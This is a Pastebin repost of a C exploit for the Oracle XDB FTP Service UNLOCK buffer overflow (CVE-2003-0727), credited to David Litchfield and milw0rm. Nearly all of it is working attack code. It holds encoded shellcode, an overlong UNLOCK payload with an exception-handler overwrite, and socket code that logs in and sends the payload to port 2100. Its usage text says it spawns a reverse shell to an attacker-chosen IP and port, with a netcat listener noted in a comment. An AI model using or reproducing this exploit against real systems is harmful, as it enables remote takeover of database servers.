FlyFar

Oracle XDB FTP Service - UNLOCK Buffer Overflow - CVE-2003-0727

Feb 6th, 2024
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.44 KB | Cybersecurity | 0 0
  1. /*  Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
  2. /*    David Litchfield from ngssoftware (at Blackhat 2003)*/
  3. /*                                                        */
  4. /*  Original Advisory :                                   */
  5. /*  http://www.blackhat.com/presentations/bh-usa-03/bh-   */
  6. /*  us-03-litchfield-paper.pdf                            */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <windows.h>
  11. #include <winsock.h>
  12.  
  13. int GainControlOfOracle(char *, char *);
  14. int StartWinsock(void);
  15. int SetUpExploit(char *,int);
  16.  
  17. struct sockaddr_in s_sa;
  18. struct hostent *he;
  19. unsigned int addr;
  20. char host[260]="";
  21.  
  22. unsigned char exploit[508]=
  23. "\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
  24. "\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
  25. "\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
  26. "\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
  27. "\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
  28. "\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
  29. "\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
  30. "\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
  31. "\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
  32. "\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
  33. "\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
  34. "\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
  35. "\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
  36. "\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
  37. "\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
  38. "\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
  39. "\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
  40. "\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
  41. "\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
  42. "\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
  43. "\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
  44. "\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
  45. "\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
  46. "\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
  47. "\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
  48. "\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
  49. "\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
  50. "\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
  51. "\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
  52. "\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
  53. "\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
  54. "\xFF\xFF\xFF\xFF";
  55.  
  56. char exploit_code[8000]=
  57. "UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
  58. "nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
  59. "DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
  60. "TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
  61. "LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
  62. "1aaaabbbbcc";
  63.  
  64.  
  65. char exception_handler[8]="\x79\x9B\xf7\x77";
  66. char short_jump[8]="\xEB\x06\x90\x90";
  67.  
  68.  
  69. int main(int argc, char *argv[])
  70. {
  71. if(argc != 6)
  72. {
  73. printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
  74. printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
  75. printf("\n\n\tSpawns a reverse shell to specified port");
  76. printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
  77. printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
  78. printf("\n\t6th July 2003\n\n\n");
  79. return 0;
  80. }
  81. strncpy(host,argv[1],250);
  82. if(StartWinsock()==0)
  83. return printf("Error starting Winsock.\n");
  84. SetUpExploit(argv[4],atoi(argv[5]));
  85. strcat(exploit_code,short_jump);
  86. strcat(exploit_code,exception_handler);
  87. strcat(exploit_code,exploit);
  88. strcat(exploit_code,"\r\n");
  89.  
  90.  
  91. GainControlOfOracle(argv[2],argv[3]);
  92. return 0;
  93. }
  94.  
  95.  
  96. int SetUpExploit(char *myip, int myport)
  97. {
  98. unsigned int ip=0;
  99. unsigned short prt=0;
  100. char *ipt="";
  101. char *prtt="";
  102.  
  103.  
  104. ip = inet_addr(myip);
  105. ipt = (char*)&ip;
  106. exploit[191]=ipt[0];
  107. exploit[192]=ipt[1];
  108. exploit[193]=ipt[2];
  109. exploit[194]=ipt[3];
  110. // set the TCP port to connect on
  111. // netcat should be listening on this port
  112. // e.g. nc -l -p 80
  113.  
  114. prt = htons((unsigned short)myport);
  115. prt = prt ^ 0xFFFF;
  116. prtt = (char *) &prt;
  117. exploit[209]=prtt[0];
  118. exploit[210]=prtt[1];
  119. return 0;
  120. }
  121.  
  122.  
  123. int StartWinsock() {
  124. int err=0; WORD wVersionRequested;
  125. WSADATA wsaData;
  126. wVersionRequested = MAKEWORD( 2, 0 );
  127. err = WSAStartup( wVersionRequested, &wsaData );
  128. if ( err != 0 )
  129. return 0;
  130.  
  131. if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
  132. { WSACleanup( );
  133. return 0; }
  134.  
  135.  
  136. if (isalpha(host[0])) {
  137. he = gethostbyname(host);
  138. s_sa.sin_addr.s_addr=INADDR_ANY;
  139. s_sa.sin_family=AF_INET;
  140. memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
  141. } else
  142. { addr = inet_addr(host);
  143. s_sa.sin_addr.s_addr=INADDR_ANY;
  144. s_sa.sin_family=AF_INET;
  145. memcpy(&s_sa.sin_addr,&addr,4);
  146. he = (struct hostent *)1;
  147. }
  148. if (he == NULL) {
  149. return 0; }
  150. return 1; }
  151.  
  152.  
  153. int GainControlOfOracle(char *user, char *pass) {
  154. char usercmd[260]="user ";
  155. char passcmd[260]="pass ";
  156. char resp[1600]="";
  157. int snd=0,rcv=0;
  158. struct sockaddr_in r_addr;
  159. SOCKET sock;
  160.  
  161.  
  162. strncat(usercmd,user,230);
  163. strcat(usercmd,"\r\n");
  164. strncat(passcmd,pass,230);
  165. strcat(passcmd,"\r\n");
  166.  
  167.  
  168. sock=socket(AF_INET,SOCK_STREAM,0);
  169. if (sock==INVALID_SOCKET)
  170. return printf(" sock error");
  171. r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
  172. r_addr.sin_port=htons((unsigned short)0);
  173.  
  174. s_sa.sin_port=htons((unsigned short)2100);
  175. if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
  176. rcv = recv(sock,resp,1500,0);
  177. printf("%s",resp);
  178. ZeroMemory(resp,1600);
  179. snd=send(sock, usercmd , strlen(usercmd) , 0);
  180. rcv = recv(sock,resp,1500,0);
  181. printf("%s",resp); ZeroMemory(resp,1600);
  182.  
  183.  
  184. snd=send(sock, passcmd , strlen(passcmd) , 0);
  185. rcv = recv(sock,resp,1500,0);
  186. printf("%s",resp);
  187. if(resp[0]=='5')
  188. { closesocket(sock);
  189. return printf("Failed to log in using user %s and password %s.\n",user,pass);
  190. }
  191. ZeroMemory(resp,1600);
  192. snd=send(sock, exploit_code, strlen(exploit_code) , 0);
  193. Sleep(2000);
  194. closesocket(sock);
  195. return 0;
  196. }
  197.  
  198. // milw0rm.com [2003-08-13]
  199.            
Add Comment
Please, Sign In to add comment